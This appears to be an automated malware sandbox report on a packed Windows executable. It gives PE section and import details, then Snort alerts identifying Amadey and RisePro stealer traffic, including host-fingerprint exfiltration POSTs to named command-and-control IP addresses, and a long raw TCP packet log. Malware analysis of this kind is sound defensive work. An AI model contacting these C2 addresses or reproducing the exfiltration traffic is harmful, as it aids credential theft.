                                                                                                                                                                                                                                      add cl, byte ptr [edx]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [edx], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0560x6a.idata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x30bda80x10wvtamnbw
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x30bd580x18wvtamnbw
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      0x10000x680000x2ea0027f4d57c5ed4e794cf51622f55ec0a83False0.9975808478552279data7.974297481762842IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .rsrc0x690000x1e00x2002946bf3dc91fdc7e68a887c12c4c9994False0.57421875data4.4501572571729415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .idata 0x6a0000x10000x20017662c92043abde8b4b3074dcc401ca6False0.1484375data1.0249469107790772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      wvtamnbw0x6b0000x2a10000x2a1000b01e7871d18fe1117f44ea4e5a2cd9a5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      jjaorssu0x30c0000x10000x400bc61cab188c73f6e815600682569c50fFalse0.833984375data6.4320942888563355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .taggant0x30d0000x30000x2200c1a4e0a38872d89768418c68b691c259False0.07915900735294118DOS executable (COM)0.7788648037350943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      RT_MANIFEST0x30bdb80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      kernel32.dlllstrcpy

                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      04/19/24-03:29:11.518092TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24971980192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      04/19/24-03:29:07.505716TCP2855239ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST)4971780192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      04/19/24-03:30:04.436794TCP2856122ETPRO TROJAN Amadey CnC Response M18049869193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:25.875488TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24976880192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      04/19/24-03:29:36.618824TCP2046269ET TROJAN [ANY.RUN] RisePro TCP (Activity)4977458709192.168.2.5147.45.47.93
                                                                                                                                                                                                                                      04/19/24-03:29:15.465561TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24972180192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      04/19/24-03:30:04.208351TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5870949870147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:21.206725TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24974180192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      04/19/24-03:29:31.281244TCP2046269ET TROJAN [ANY.RUN] RisePro TCP (Activity)4976258709192.168.2.5147.45.47.93
                                                                                                                                                                                                                                      04/19/24-03:29:36.518747TCP2046269ET TROJAN [ANY.RUN] RisePro TCP (Activity)4977358709192.168.2.5147.45.47.93
                                                                                                                                                                                                                                      04/19/24-03:30:06.348500TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24988080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      04/19/24-03:30:07.998984TCP2044696ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M24988680192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      04/19/24-03:29:23.961610TCP2049060ET TROJAN RisePro TCP Heartbeat Packet4976258709192.168.2.5147.45.47.93
                                                                                                                                                                                                                                      04/19/24-03:30:16.706571TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5870949918147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:08.315222TCP2856151ETPRO TROJAN Amadey CnC Activity M74971880192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      04/19/24-03:29:47.530154TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5870949822147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:03.313673TCP2856147ETPRO TROJAN Amadey CnC Activity M34971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      04/19/24-03:30:09.223113TCP2855239ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST)4989280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      04/19/24-03:34:03.054930TCP2856147ETPRO TROJAN Amadey CnC Activity M35073480192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      04/19/24-03:29:24.139646TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5870949762147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:30:08.961575TCP2856151ETPRO TROJAN Amadey CnC Activity M74989080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      04/19/24-03:29:24.405929TCP2046267ET TROJAN [ANY.RUN] RisePro TCP (External IP)5870949762147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:03.820669TCP2856122ETPRO TROJAN Amadey CnC Response M18049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:30.283553TCP2046267ET TROJAN [ANY.RUN] RisePro TCP (External IP)5870949773147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:40.962203TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5870949809147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:30.339002TCP2046267ET TROJAN [ANY.RUN] RisePro TCP (External IP)5870949774147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:30.018405TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5870949773147.45.47.93192.168.2.5
                                                                                                                                                                                                                                      04/19/24-03:29:30.089886TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)5870949774147.45.47.93192.168.2.5

                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Apr 19, 2024 03:27:53.872072935 CEST49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:27:53.874100924 CEST49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:27:53.997112989 CEST49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:03.481525898 CEST49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:03.481538057 CEST49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:03.606406927 CEST49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:05.018177986 CEST4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:05.018342972 CEST49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.002206087 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.002280951 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.002387047 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.004585981 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.004617929 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.420850992 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.420959949 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.424269915 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.424319029 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.424804926 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.465787888 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.872992039 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.920135021 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.997692108 CEST49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.997773886 CEST49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.998142004 CEST49709443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.998208046 CEST4434970923.1.237.91192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.998296022 CEST49709443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.998544931 CEST49709443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:14.998589039 CEST4434970923.1.237.91192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.133758068 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.133821011 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.133841991 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.133892059 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.133912086 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.133955956 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.133982897 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134021997 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134025097 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134025097 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134026051 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134052038 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134064913 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134093046 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134114981 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134128094 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134253025 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.134339094 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.149897099 CEST4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.149944067 CEST4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.320208073 CEST4434970923.1.237.91192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.320450068 CEST49709443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.385950089 CEST49705443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:15.386001110 CEST4434970513.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:34.468430996 CEST4434970923.1.237.91192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:34.468517065 CEST49709443192.168.2.523.1.237.91
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:52.708223104 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:52.708260059 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:52.708328009 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:52.708919048 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:52.708933115 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.120843887 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.120949030 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.125181913 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.125204086 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.125614882 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.134411097 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.180135965 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510593891 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510647058 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510706902 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510714054 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510761023 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510792971 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510812998 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510854006 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510899067 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510925055 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510936975 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510977983 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510989904 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.511044979 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.511095047 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515682936 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515727043 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515754938 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515770912 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.068969965 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.069570065 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.313261032 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.313384056 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.313673019 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.314997911 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.315206051 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.315207005 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.557965994 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.558506012 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.558689117 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560514927 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560527086 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560641050 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560741901 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560781956 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560818911 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560858011 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560935974 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560937881 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560945034 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560977936 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560997009 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561017036 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561031103 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561055899 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561073065 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561106920 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.805172920 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806427002 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806530952 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806543112 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806585073 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806602955 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806626081 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806647062 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806663990 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806684017 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806700945 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806720018 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806746006 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806756973 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806785107 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806802034 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806823015 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806838989 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806862116 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806879997 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806899071 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806917906 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806938887 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806962013 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806977987 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806991100 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807015896 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807029963 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807054043 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807079077 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807092905 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807105064 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807133913 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807146072 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807174921 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807187080 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807213068 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807230949 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807255030 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807265997 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807306051 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.820668936 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.820761919 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.823647022 CEST4971580192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053028107 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053149939 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053189993 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053204060 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053204060 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053229094 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053241014 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053273916 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053282976 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053312063 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053350925 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053389072 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053426027 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053456068 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053456068 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.053456068 CEST4971480192.168.2.5193.233.132.56
